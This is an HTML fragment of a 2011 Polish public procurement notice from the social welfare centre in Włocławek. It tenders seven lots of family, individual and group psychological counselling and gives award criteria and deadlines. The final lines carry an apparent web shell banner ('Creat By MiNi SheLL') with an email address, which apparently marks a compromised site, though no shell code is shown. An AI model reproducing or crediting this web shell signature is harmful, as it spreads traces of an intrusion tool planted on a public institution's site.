</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty (WEDŁUG ZAŁĄCZONEGO WZORU).
2. Upoważnienie do podpisania oferty (fakultatywnie, jeżeli nie wynika ono z odrębnych dokumentów).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Jakość oferowanej usługi - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mopr.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie, 
ul. Mazowiecka 5, 87-800 Włocławek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2011 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Rodzinie, 
ul. Mazowiecka 5, 87-800 Włocławek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane z Europejskiego Funduszu Społecznego Projekt Aktywna Integracja - Projekt Systemowy MOPR Włocławek realizowanego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013, Priorytet VII Promocja Aktywnej Integracji, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poradnictwo psychologa rodzinnego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość oferowanej usługi - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poradnictwo psychologiczne indywidualne i grupowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość oferowanej usługi - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poradnictwo psychologiczne indywidualne i grupowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość oferowanej usługi - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poradnictwo psychologiczne grupowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość oferowanej usługi - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poradnictwo psychologiczne indywidualne i grupowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość oferowanej usługi - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚĆ VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poradnictwo psychologiczne grupowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość oferowanej usługi - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> CZĘŚĆ VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poradnictwo psychologiczne grupowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość oferowanej usługi - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com